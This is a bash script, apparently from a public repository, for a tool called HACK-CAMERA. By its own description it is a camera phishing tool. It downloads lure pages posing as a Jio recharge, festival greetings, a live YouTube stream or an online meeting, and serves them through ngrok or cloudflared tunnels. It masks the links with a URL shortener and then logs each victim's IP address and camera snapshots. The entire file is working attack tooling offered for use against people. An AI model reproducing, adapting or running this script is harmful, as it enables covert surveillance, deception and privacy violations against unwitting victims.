a year ago
16 kB
#!/bin/bash # HACK-CAMERA # Version : 2.1 # Description: CameraHackHack is a camera Phishing tool. Send a phishing link to victim, if he/she gives access to camera, his/her photo will be captured! # Author : X PHANTOM PH4N70M # Github : https://github.com/hackerxphantom # Join Us : https://bit.ly/3PV3S3r # Date : 29-05-2022 # Language : Shell, HTML, Css # Portable File # If you copy, consider giving credit! We keep our code open source to help others # Colors black="\033[1;30m" red="\033[1;31m" green="\033[1;32m" yellow="\033[1;33m" blue="\033[1;34m" purple="\033[1;35m" cyan="\033[1;36m" violate="\033[1;37m" white="\033[0;37m" nc="\033[00m" # Output snippets info="${red}[${white}+${red}] ${cyan}" ask="${red}[${white}?${red}] ${violate}" error="${cyan}[${white}!${cyan}] ${red}" success="${red}[${white}√${red}] ${green}" cwd=`pwd` # Logo logo=" ${blue} _ _ _ ____ _ __ ____ _ __ __ _____ ____ _ ${blue} | | | | / \ / ___| |/ / / ___| / \ | \/ | ____| _ \ / \ ${blue} | |_| | / _ \| | | ' /_____| | / _ \ | |\/| | _| | |_) | / _ \ ${blue} | _ |/ ___ \ |___| . \_____| |___ / ___ \| | | | |___| _ < / ___ \ ${blue} |_| |_/_/ \_\____|_|\_\ \____/_/ \_\_| |_|_____|_| \_\/_/ \_\ ${green} [By X PHANTOM (PH4N7OM)] " # Package Installer pacin(){ if $sudo && $pacman; then sudo pacman -S $1 --noconfirm fi } # Kill running instances of required packages killer() { if [ `pidof php > /dev/null 2>&1` ]; then killall php fi if [ `pidof ngrok > /dev/null 2>&1` ]; then killall ngrok fi if [ `pidof cloudflared > /dev/null 2>&1` ]; then killall cloudflared fi if [ `pidof curl > /dev/null 2>&1` ]; then killall curl fi if [ `pidof wget > /dev/null 2>&1` ]; then killall wget fi if [ `pidof unzip > /dev/null 2>&1` ]; then killall unzip fi } # Check if offline netcheck() { while true; do wget --spider --quiet https://github.com if [ "$?" != 0 ]; then echo -e "${error}No internet!\007\n" sleep 2 else break fi done } # Delete ngrok file ngrokdel() { unzip ngrok.zip rm -rf ngrok.zip } # Set template replacer() { while true; do if echo $option | grep -q "1"; then sed "s+forwarding_link+"$1"+g" grabcam.html > index2.html sed "s+forwarding_link+"$1"+g" template.php > index.php break elif echo $option | grep -q "2"; then sed "s+forwarding_link+"$1"+g" template.php > index.php sed "s+forwarding_link+"$1"+g" festivalwishes.html > index3.html sed "s+fes_name+"$fest_name"+g" index3.html > index2.html rm -rf index3.html break elif echo $option | grep -q "3"; then sed "s+forwarding_link+"$1"+g" template.php > index.php sed "s+forwarding_link+"$1"+g" LiveYTTV.html > index3.html sed "s+live_yt_tv+"$vid_id"+g" index3.html > index2.html rm -rf index3.html break elif echo $option | grep -q "4"; then sed "s+forwarding_link+"$1"+g" template.php > index.php sed "s+forwarding_link+"$1"+g" OnlineMeeting.html > index2.html break fi done echo -e "${info}Your urls are: ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ \n" sleep 1 echo -e "${success}Link 1 : ${1}\n" sleep 1 netcheck masked=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${1}) if ! [[ -z $masked ]]; then echo -e "${success}URL 2 > ${masked}\n" fi } # Prevent ^C stty -echoctl # Detect UserInterrupt trap "echo -e '\n${success}Thanks for Using! Visit Site : https://bit.ly/3LAy80f\n'; exit" 2 # Termux if [[ -d /data/data/com.termux/files/home ]]; then termux-fix-shebang hack_camera.sh termux=true else termux=false fi # Workdir if $termux; then if ! [ -d /sdcard/Pictures ]; then cd /sdcard && mkdir Pictures fi export FOL="/sdcard/Pictures" cd "$FOL" if ! [[ -e ".temp" ]]; then touch .temp || (termux-setup-storage && echo -e "\n${error}Please Restart Termux!\n\007" && sleep 5 && exit 0) fi cd "$cwd" else if [ -d "$HOME/Pictures" ]; then export FOL="$HOME/Pictures" else export FOL="$cwd" fi fi # Set Tunneler export TN="Cloudflared" # Set Package Manager if [ `command -v sudo` ]; then sudo=true else sudo=false fi if $sudo; then if [ `command -v apt` ]; then pac_man="sudo apt" elif [ `command -v apt-get` ]; then pac_man="sudo apt-get" elif [ `command -v yum` ]; then pac_man="sudo yum" elif [ `command -v dnf` ]; then pac_man="sudo dnf" elif [ `command -v apk` ]; then pac_man="sudo apk" elif [ `command -v pacman` ]; then pacman=true else echo -e "${error}No supported package manager found! Install packages manually!\007\n" exit 1 fi else if [ `command -v apt` ]; then pac_man="apt" elif [ `command -v apt-get` ]; then pac_man="apt-get" elif [ `command -v brew` ]; then pac_man="brew" else echo -e "${error}No supported package manager found! Install packages manually!\007\n" exit 1 fi fi # Install Dependicies if ! [ `command -v php` ]; then echo -e "${info}Installing php...." $pac_man install php -y pacin php fi if ! [ `command -v curl` ]; then echo -e "${info}Installing curl...." $pac_man install curl -y pacin "unzip" fi if ! [ `command -v unzip` ]; then echo -e "${info}Installing unzip...." $pac_man install unzip -y pacin "unzip" fi if ! [ `command -v wget` ]; then echo -e "${info}Installing wget...." $pac_man install wget -y pacin "wget" fi if $termux; then if ! [ `command -v proot` ]; then echo -e "${info}Installing proot...." pkg install proot -y fi if ! [ `command -v proot` ]; then echo -e "${error}Proot can't be installed!\007\n" exit 1 fi fi if ! [ `command -v php` ]; then echo -e "${error}PHP cannot be installed!\007\n" exit 1 fi if ! [ `command -v curl` ]; then echo -e "${error}Curl cannot be installed!\007\n" exit 1 fi if ! [ `command -v unzip` ]; then echo -e "${error}Unzip cannot be installed!\007\n" exit 1 fi if ! [ `command -v wget` ]; then echo -e "${error}Wget cannot be installed!\007\n" exit 1 fi if [ `pidof php > /dev/null 2>&1` ]; then echo -e "${error}Previous php cannot be closed. Restart terminal!\007\n" killer; exit 1 fi if [ `pidof ngrok > /dev/null 2>&1` ]; then echo -e "${error}Previous ngrok cannot be closed. Restart terminal!\007\n" killer; exit 1 fi # Termux should run from home if $termux; then path=`pwd` if echo "$path" | grep -q "home"; then printf "" else echo -e "${error}Invalid directory. Run from home!\007\n" killer; exit 1 fi fi # Download tunnlers if ! [[ -f $HOME/.ngrokfolder/ngrok && -f $HOME/.cffolder/cloudflared ]] ; then if ! [[ -d $HOME/.ngrokfolder ]]; then cd $HOME && mkdir .ngrokfolder fi if ! [[ -d $HOME/.cffolder ]]; then cd $HOME && mkdir .cffolder fi p=`uname -m` d=`uname` while true; do echo -e "\n${info}Downloading Tunnelers:\n" netcheck if [ -e ngrok.zip ];then rm -rf ngrok.zip fi cd "$cwd" if echo "$d" | grep -q "Darwin"; then if echo "$p" | grep -q "x86_64"; then wget -q --show-progress "https://github.com/KasRoudra/files/raw/main/ngrok/ngrok-stable-darwin-amd64.zip" -O "ngrok.zip" ngrokdel wget -q --show-progress "https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-darwin-amd64.tgz" -O "cloudflared.tgz" tar -zxf cloudflared.tgz > /dev/null 2>&1 rm -rf cloudflared.tgz break elif echo "$p" | grep -q "arm64"; then wget -q --show-progress "https://github.com/KasRoudra/files/raw/main/ngrok/ngrok-stable-arm64.zip" -O "ngrok.zip" ngrokdel echo -e "${error}Cloudflared not available for device architecture!" sleep 3 break else echo -e "${error}Device architecture unknown. Download ngrok/cloudflared manually!" sleep 3 break fi elif echo "$d" | grep -q "Linux"; then if echo "$p" | grep -q "aarch64"; then if [ -e ngrok-stable-linux-arm64.tgz ];then rm -rf ngrok-stable-linux-arm64.tgz fi wget -q --show-progress "https://github.com/KasRoudra/files/raw/main/ngrok/ngrok-stable-linux-arm64.tgz" -O "ngrok.tgz" tar -zxf ngrok.tgz rm -rf ngrok.tgz wget -q --show-progress "https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-arm64" -O "cloudflared" break elif echo "$p" | grep -q "arm"; then wget -q --show-progress "https://github.com/KasRoudra/files/raw/main/ngrok/ngrok-stable-linux-arm.zip" -O "ngrok.zip" ngrokdel wget -q --show-progress 'https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-arm' -O "cloudflared" break elif echo "$p" | grep -q "x86_64"; then wget -q --show-progress "https://github.com/KasRoudra/files/raw/main/ngrok/ngrok-stable-linux-amd64.zip" -O "ngrok.zip" ngrokdel wget -q --show-progress 'https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64' -O "cloudflared" break else wget -q --show-progress "https://github.com/KasRoudra/files/raw/main/ngrok/ngrok-stable-linux-386.zip" -O "ngrok.zip" ngrokdel wget -q --show-progress "https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-386" -O "cloudflared" break fi else echo -e "${error}Unsupported Platform!" exit fi done sleep 1 cd "$cwd" mv -f ngrok $HOME/.ngrokfolder mv -f cloudflared $HOME/.cffolder if $sudo; then sudo chmod +x $HOME/.ngrokfolder/ngrok sudo chmod +x $HOME/.cffolder/cloudflared else chmod +x $HOME/.ngrokfolder/ngrok chmod +x $HOME/.cffolder/cloudflared fi fi # Start Point while true; do clear echo -e "$logo" sleep 1 echo -e "${ask}Choose an option: ${red}[${white}1${red}] ${cyan}Jio Recharge ${red}[${white}2${red}] ${cyan}Festival ${red}[${white}3${red}] ${cyan}Live Youtube ${red}[${white}4${red}] ${cyan}Online Meeting ${red}[${white}d${red}] ${cyan}Change Image Directory (current: ${red}${FOL}${yellow}) ${red}[${white}p${red}] ${cyan}Change Default Port (current: ${red}${PORT}${yellow}) ${red}[${white}t${red}] ${cyan}Change Default Tunneler (current: ${red}${TN}${yellow}) ${red}[${white}x${red}] ${cyan}About ${red}[${white}m${red}] ${cyan}More tools ${red}[${white}0${red}] ${cyan}Exit${blue} " sleep 1 printf "${cyan}\nXPHANTOM${nc}@${blue}PH4N70M ${red}$ ${nc}" read option # Select template if echo $option | grep -q "1"; then dir="jio" break elif echo $option | grep -q "2"; then dir="fest" printf "\n${ask}Enter festival name:${cyan}\n\nXPHANTOM${nc}@${blue}XPH4N70M ${red}$ ${nc}" read fest_name if [ -z $fest_name ]; then echo -e "\n${error}Invalid input!\n\007" sleep 1 else fest_name="${fest_name//[[:space:]]/}" break fi elif echo $option | grep -q "3"; then dir="live" printf "\n${ask}Enter youtube video ID:${cyan}\n\nXPhantom${nc}@${blue}XPH4N70M ${red}$ ${nc}" read vid_id if [ -z $vid_id ]; then echo -e "\n${error}Invalid input!\n\007" sleep 1 else break fi elif echo $option | grep -q "4"; then dir="om" break elif echo $option | grep -q "t"; then if [ $TN == "Cloudflared" ]; then export TN="Ngrok" else export TN="Cloudflared" fi elif echo $option | grep -q "i"; then printf "\n${ask}Enter Directory:${cyan}\n\nXPHANTOM${nc}@${blue}XPH4N70M ${red}$ ${nc}" read dire if ! [ -d $dire ]; then echo -e "\n${error}Invalid directory!\n\007" sleep 1 else export FOL="$dire" echo -e "\n${success}Directory changed successfully!\n" sleep 1 fi elif echo $option | grep -q "x"; then clear echo -e "$logo" echo -e "$red[ToolName] ${cyan} :[HACK-CAMERA] $red[Version] ${cyan} :[2.1] $red[Description]${cyan} :[Camera Phishing tool] $red[Author] ${cyan} :[XPHANTOM PH4N70M] $red[Github] ${cyan} :[https://github.com/hackerxphantom] $red[Join us] ${cyan} :[https://bit.ly/3PV3S3r] $red[Telegarm] ${cyan} :[https://t.me/x_PH4N7OM]" printf "${cyan}\nXPHANTOM${nc}@${cyan}XPH4N70M ${red}$ ${nc}" read about elif echo $option | grep -q "m"; then xdg-open "https://bit.ly/3PV3S3r" elif echo $option | grep -q "0"; then exit 0 else echo -e "\n${error}Invalid input!\007" sleep 1 fi done cd $cwd if [ -e websites.zip ];then unzip websites.zip > /dev/null 2>&1 rm -rf websites.zip fi if ! [ -d $dir ];then mkdir $dir cd $dir netcheck wget -q --show-progress "https://github.com/XPH4N70M/files/raw/main/${dir}.zip" unzip ${dir}.zip > /dev/null 2>&1 rm -rf ${dir}.zip else cd $dir fi # Hotspot required for termux if $termux; then echo -e "\n${info}If you haven't turned on hotspot, please enable it!" sleep 3 fi echo -e "\n${info}Starting PHP Server at\n" netcheck php -S > /dev/null 2>&1 & sleep 2 echo -e "${info}Starting link tunnelers......\n" if [ -e "$HOME/.cffolder/log.txt" ]; then rm -rf "$HOME/.cffolder/log.txt" fi netcheck cd $HOME/.ngrokfolder && ./ngrok http > /dev/null 2>&1 & if $termux; then cd $HOME/.cffolder && termux-chroot ./cloudflared tunnel -url "" --logfile "log.txt" > /dev/null 2>&1 & else cd $HOME/.cffolder && ./cloudflared tunnel -url "" --logfile "log.txt" > /dev/null 2>&1 & fi sleep 8 ngroklink=$(curl -s -N | grep -o "https://[-0-9a-z]*\.ngrok.io") if (echo "$ngroklink" | grep -q "ngrok"); then ngrokcheck=true else ngrokcheck=false fi cflink=$(grep -o 'https://[-0-9a-z]*\.trycloudflare.com' "$HOME/.cffolder/log.txt") if (echo "$cflink" | grep -q "cloudflare"); then cfcheck=true else cfcheck=false fi while true; do if ( $cfcheck && $ngrokcheck ); then if [ $TN == "Cloudflared" ]; then echo -e "${success}Cloudflared choosen!\n" replacer "$cflink" else echo -e "${success}Ngrok choosen!\n" replacer "$ngroklink" fi break fi if ( $cfcheck && ! $ngrokcheck ); then echo -e "${success}Cloudflared started succesfully!\n" replacer "$cflink" break fi if ( ! $cfcheck && $ngrokcheck ); then echo -e "${success}Ngrok started succesfully!\n" replacer "$ngroklink" break fi if ! ( $cfcheck && $ngrokcheck ); then echo -e "${error}Tunneling failed!\n" killer; exit 1 fi done sleep 1 status=$(curl -s --head -w %{http_code} -o /dev/null) if echo "$status" | grep -q "404"; then echo -e "${error}PHP couldn't start!\n\007" killer; exit 1 else echo -e "${success}PHP started succesfully!\n" fi sleep 1 rm -rf ip.txt echo -e "${info}Waiting for target. ${cyan}Press ${red}Ctrl + C ${cyan}to exit...\n" while true; do if [[ -e "ip.txt" ]]; then echo -e "\007${success}Target opened the link!\n" while IFS= read -r line; do echo -e "${green}[${blue}*${green}]${yellow} $line" done < ip.txt echo "" cat ip.txt >> $cwd/ips.txt rm -rf ip.txt fi sleep 0.5 if [[ -e "log.txt" ]]; then echo -e "\007${success}IMAGE FILE RECEIVED ! Download...\n" file=`ls | grep png` mv -f $file $FOL rm -rf log.txt fi sleep 0.5 done